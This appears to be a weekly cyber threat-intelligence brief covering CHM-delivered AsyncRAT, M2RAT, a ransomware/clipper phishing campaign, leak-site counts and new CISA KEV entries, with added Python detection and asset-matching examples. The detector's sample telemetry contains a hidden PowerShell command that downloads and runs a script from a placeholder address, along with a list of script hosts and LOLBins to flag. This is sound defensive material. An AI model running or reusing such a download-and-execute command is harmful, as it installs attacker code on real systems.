Cyber Intel Brief: Feb 09 – 15, 2023

Threat Landscape

Department of Health and Human Services Publishes Annual Report

Impacted Industries: Healthcare and Social Services

What You Need To Know:

The Health Sector Cybersecurity Coordination Center (HC3) of the US Department of Health and Human Services published a 103-page report titled 2022 Healthcare Cybersecurity Year in Review and a 2023 Look-Ahead. The report aims to answer three questions based on data from 2022. HC3 assesses that ransomware and data breaches will likely continue to threaten the healthcare and social services industry, and that cybercriminals will continue leveraging traditional infection vectors to facilitate attacks. HC3 also assesses that geopolitical events unrelated to healthcare can directly or indirectly affect the US healthcare and social services industry.


Windows Help File Used to Deliver AsyncRAT and Malware That Takes Screenshots

Impacted Industries: Accommodation: Traveler; Potential for All

What You Need To Know:

AhnLab has confirmed the distribution, through Windows Help files (.chm), of AsyncRAT, a publicly available remote access tool, and of an infostealer designed to take screenshots. AhnLab does not disclose how the victim received the CHM file. When opened, the Windows Help file downloaded several additional files, which in turn executed a series of PowerShell commands.
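A CHM file is rendered by hh.exe, the Windows HTML Help executable, so the chain AhnLab describes leaves two signals in process-creation telemetry: hh.exe opening a .chm from a user-writable location, and hh.exe spawning a command interpreter or script host. The following Python is an added example (not AhnLab's analysis, samples, or tooling) that scores Sysmon-style process-creation records for those two signals. The event records, user name, file names, and the 203.0.113.10 address are constructed for illustration.

```python
"""Flag process-creation events consistent with a .chm (Windows Help) delivery chain."""
import json
import re
from pathlib import PureWindowsPath

# Constructed Sysmon Event ID 1 (process creation) records as JSON lines. They
# illustrate an hh.exe -> cmd.exe -> powershell.exe chain, not AhnLab's samples;
# the user, file names and 203.0.113.10 are placeholders.
SAMPLE_EVENTS = r"""
{"Image": "C:\\Windows\\hh.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "\"C:\\Windows\\hh.exe\" \"C:\\Users\\alice\\Downloads\\booking details.chm\""}
{"Image": "C:\\Windows\\System32\\cmd.exe", "ParentImage": "C:\\Windows\\hh.exe", "CommandLine": "cmd.exe /c powershell -w hidden -ep bypass -c \"iwr http://203.0.113.10/a.ps1 -OutFile $env:TEMP\\a.ps1; & $env:TEMP\\a.ps1\""}
{"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentImage": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "powershell -w hidden -ep bypass -c \"iwr http://203.0.113.10/a.ps1 -OutFile $env:TEMP\\a.ps1; & $env:TEMP\\a.ps1\""}
{"Image": "C:\\Windows\\hh.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "\"C:\\Windows\\hh.exe\" \"C:\\Program Files\\Vendor\\manual.chm\""}
{"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "\"powershell.exe\""}
"""

# Interpreters and LOLBins that the Help viewer has no legitimate reason to launch.
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "pwsh.exe", "mshta.exe", "wscript.exe",
                "cscript.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe", "bitsadmin.exe"}
# Path fragments that indicate a user-writable location (a .chm shipped with
# installed software normally lives under Program Files or the product folder).
USER_WRITABLE = ("\\users\\", "\\appdata\\", "\\temp\\", "\\downloads\\", "\\programdata\\")
# Pull the first quoted or unquoted Windows path ending in .chm out of a command line.
CHM_PATH = re.compile(r'([A-Za-z]:\\[^"]*?\.chm)', re.IGNORECASE)


def _basename(path):
    return PureWindowsPath(path).name.lower()


def load_events(text):
    """Parse JSON-lines telemetry, skipping blank lines."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def detect(events):
    """Return one alert per matching rule, in event order."""
    alerts = []
    for ev in events:
        image, parent = _basename(ev["Image"]), _basename(ev["ParentImage"])
        cmd = ev.get("CommandLine", "")
        # Rule 1: the Help viewer spawned a command interpreter or script host.
        if parent == "hh.exe" and image in SCRIPT_HOSTS:
            alerts.append({"severity": "high", "rule": "hh.exe spawned script host",
                           "image": ev["Image"], "commandline": cmd})
        # Rule 2: the Help viewer opened a .chm from a user-writable path.
        if image == "hh.exe":
            match = CHM_PATH.search(cmd)
            if match and any(frag in match.group(1).lower() for frag in USER_WRITABLE):
                alerts.append({"severity": "medium", "rule": "chm opened from user-writable path",
                               "image": ev["Image"], "commandline": cmd})
    return alerts


if __name__ == "__main__":
    for alert in detect(load_events(SAMPLE_EVENTS)):
        print(f"[{alert['severity']}] {alert['rule']}: {alert['commandline']}")
```

Rule 1 is the strong signal and Rule 2 the weak one; the benign manual.chm under Program Files and the interactive powershell.exe launched from Explorer produce no alert. The third record (cmd.exe launching PowerShell with a download cradle) is not matched here because only the direct parent is examined; a production rule would walk ProcessGuid/ParentProcessGuid to tie it back to hh.exe.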


New Malware M2RAT Steals Sensitive Data

Impacted Industries: All

What You Need To Know:

AhnLab details an incident in which cybercriminals used a new malware, dubbed M2RAT, delivered through phishing email attachments. The malware can collect process information, keystrokes, and document and voice files, including files on connected portable devices. It captures screenshots periodically, and the operator can also issue a command to capture one on demand. M2RAT uses a shared memory section for C2 communication and for staging stolen data, so the data is transferred to the C2 server without being written to disk on the compromised system. AhnLab attributed the attack to APT37 (RedEyes, ScarCruft), basing the attribution on the techniques employed having previously been used by APT37.


Phishing Email Leads to Ransomware or Cryptocurrency Wallet Theft

Impacted Industries: All

What You Need To Know:

Cisco Talos has observed an unknown cybercriminal deploying two relatively new threats, the recently discovered MortalKombat ransomware or a variant of the Laplas Clipper malware, to extort victims or steal cryptocurrency from them. A clipper monitors the clipboard for cryptocurrency wallet addresses and swaps them for attacker-controlled addresses, so a victim pasting an address into a transaction sends funds to the attacker. A typical infection in this campaign begins with a phishing email carrying a ZIP attachment. When the target opens the attachment, it kicks off a multi-stage attack chain in which the cybercriminal delivers either the clipper malware or the ransomware, then deletes the malicious files to hinder detection and analysis. Talos treats the activity as the work of a single actor; using the Analysis of Competing Hypotheses, we assess that two separate cybercriminals used the same Phishing-as-a-Service offering or phishing kit.

Threat Actors

Latest Additions to Data Leak Sites

Impacted Industries: All

What You Need To Know:

In the past week, monitored threat groups added 32 victims to their leak sites. Twenty-one of those listed are US-based; Great Britain and France had two victims each. The most represented industries were manufacturing and professional services, with five victims, followed by transportation and education, with three victims each. These listings represent victims whom the cybercriminals may have successfully attacked and who opted not to negotiate or pay a ransom. We cannot confirm the validity of the cybercriminals' claims.

Exploited Vulnerabilities

CISA Adds Seven CVEs to its Known Exploited Vulnerabilities Catalog

Impacted Industries: All

What You Need To Know:

Based on evidence of active exploitation, CISA has added seven CVEs (listed below) to its Known Exploited Vulnerabilities Catalog. The affected vendors include Fortra, TerraMaster, Intel, Apple, and Microsoft. Multiple sources routinely report the exploitation of public-facing applications as one of the top initial infection vectors, so the internet-facing products on this list (GoAnywhere MFT and TerraMaster OS) warrant the most urgent attention.

  • CVE-2023-0669 – Fortra GoAnywhere MFT
  • CVE-2022-24990 – TerraMaster OS
  • CVE-2015-2291 – Intel Ethernet Diagnostics Driver for Windows
  • CVE-2023-21823 – Microsoft Windows
  • CVE-2023-23529 – Apple iOS, iPadOS, and macOS (WebKit)
  • CVE-2023-23376 – Microsoft Windows
  • CVE-2023-21715 – Microsoft Office
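The practical use of a KEV addition is to find which of your own assets run the listed software and to rank them by exposure and remediation due date. The following Python is an added example, not CISA's or Deepwatch's tooling: it loads an excerpt in the shape of CISA's KEV JSON feed, normalises vendor/product names, and cross-references them against a small asset inventory. The seven CVE IDs and vendor/product pairs are the ones above; the dateAdded/dueDate values, host names, inventory, and the TerraMaster OS to TOS alias are constructed for illustration.

```python
"""Cross-reference an asset inventory against a CISA KEV catalog excerpt."""
import json
from datetime import date

# Constructed excerpt in the shape of CISA's KEV JSON feed. The CVE IDs and
# vendor/product pairs are the seven added this week; dateAdded/dueDate are
# illustrative placeholders, not the values in CISA's catalog.
KEV_SNAPSHOT = json.dumps({
    "title": "CISA Catalog of Known Exploited Vulnerabilities (excerpt)",
    "vulnerabilities": [
        {"cveID": "CVE-2023-0669", "vendorProject": "Fortra", "product": "GoAnywhere MFT",
         "dateAdded": "2023-02-10", "dueDate": "2023-03-03"},
        {"cveID": "CVE-2022-24990", "vendorProject": "TerraMaster", "product": "TOS",
         "dateAdded": "2023-02-10", "dueDate": "2023-03-03"},
        {"cveID": "CVE-2015-2291", "vendorProject": "Intel", "product": "Ethernet Diagnostics Driver for Windows",
         "dateAdded": "2023-02-10", "dueDate": "2023-03-03"},
        {"cveID": "CVE-2023-21823", "vendorProject": "Microsoft", "product": "Windows",
         "dateAdded": "2023-02-14", "dueDate": "2023-03-07"},
        {"cveID": "CVE-2023-23529", "vendorProject": "Apple", "product": "Multiple Products",
         "dateAdded": "2023-02-14", "dueDate": "2023-03-07"},
        {"cveID": "CVE-2023-23376", "vendorProject": "Microsoft", "product": "Windows",
         "dateAdded": "2023-02-14", "dueDate": "2023-03-07"},
        {"cveID": "CVE-2023-21715", "vendorProject": "Microsoft", "product": "Office",
         "dateAdded": "2023-02-14", "dueDate": "2023-03-07"},
    ],
})

# Constructed asset inventory; host names and exposure flags are placeholders.
INVENTORY = [
    {"host": "mft-edge-01", "vendor": "Fortra", "product": "GoAnywhere MFT", "internet_facing": True},
    {"host": "nas-lab-02", "vendor": "TerraMaster", "product": "TerraMaster OS", "internet_facing": True},
    {"host": "ws-finance-17", "vendor": "Microsoft", "product": "Windows", "internet_facing": False},
    {"host": "ws-finance-17", "vendor": "Microsoft", "product": "Office", "internet_facing": False},
    {"host": "db-core-03", "vendor": "Oracle", "product": "Database", "internet_facing": False},
]

# Local product names rarely match KEV's spelling exactly; this alias map is an
# assumed, site-specific mapping from inventory naming to KEV naming.
ALIASES = {"terramaster os": "tos"}


def _norm(text):
    """Lower-case, collapse whitespace, and apply the alias map."""
    key = " ".join(text.lower().split())
    return ALIASES.get(key, key)


def load_kev(raw_json):
    """Index KEV entries by normalised (vendorProject, product)."""
    index = {}
    for entry in json.loads(raw_json)["vulnerabilities"]:
        key = (_norm(entry["vendorProject"]), _norm(entry["product"]))
        index.setdefault(key, []).append(entry)
    return index


def match_inventory(kev_index, inventory, today):
    """Return findings sorted internet-facing first, then by soonest (or most overdue) due date."""
    findings = []
    for asset in inventory:
        key = (_norm(asset["vendor"]), _norm(asset["product"]))
        for entry in kev_index.get(key, []):
            days = (date.fromisoformat(entry["dueDate"]) - today).days
            findings.append({"host": asset["host"], "cve": entry["cveID"],
                             "internet_facing": asset["internet_facing"],
                             "days_to_due": days, "overdue": days < 0})
    findings.sort(key=lambda f: (not f["internet_facing"], f["days_to_due"], f["host"]))
    return findings


TODAY = date(2023, 3, 5)  # fixed date so the ranking is reproducible
FINDINGS = match_inventory(load_kev(KEV_SNAPSHOT), INVENTORY, TODAY)

if __name__ == "__main__":
    for f in FINDINGS:
        status = "OVERDUE" if f["overdue"] else f"due in {f['days_to_due']}d"
        print(f"{f['host']:<14} {f['cve']:<15} exposed={f['internet_facing']} {status}")
```

With the placeholder dates and a reference date of 5 March 2023, the two internet-facing hosts come out first and already overdue, while the workstation's three Microsoft entries follow with two days remaining; the Oracle host and the Intel and Apple entries with no matching asset produce nothing. Matching on exact vendor/product keys is deliberate: a substring match would pair "Windows" with every product containing that word.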

What We Mean When We Say

Estimates of Likelihood

We use probabilistic language to reflect the Intel Team's estimates of the likelihood of developments or events, because analytical judgments are not certain. Terms like "probably," "likely," "very likely," and "almost certainly" denote a higher than even chance. The terms "unlikely" and "remote" imply that an event has a lower than even chance of occurring; they do not imply that it will not occur. Terms like "might" reflect situations where we are unable to assess the likelihood, usually because relevant information is lacking, sketchy, or fragmented. Terms like "we can't dismiss," "we can't rule out," and "we can't discount" refer to an unlikely, improbable, or distant event with significant consequences.

Confidence in Assessments

Our assessments and projections are based on data that varies in scope, quality, and source. As a result, we assign our assessments high, moderate, or low levels of confidence, as follows:

  • High confidence indicates that our judgments are based on reliable information and/or that the nature of the problem allows us to make a sound judgment. However, a "high confidence" judgment is not a fact or a guarantee, and it still carries the risk of being incorrect.
  • Moderate confidence denotes that the information is credible and plausible, but not of high enough quality or sufficiently corroborated to warrant a higher level of assurance.
  • Low confidence indicates that the information’s credibility and/or plausibility are in doubt, that the information is too fragmented or poorly corroborated to make solid analytic inferences, or that we have serious concerns or problems with the sources.



Subscribe to the Deepwatch Insights Blog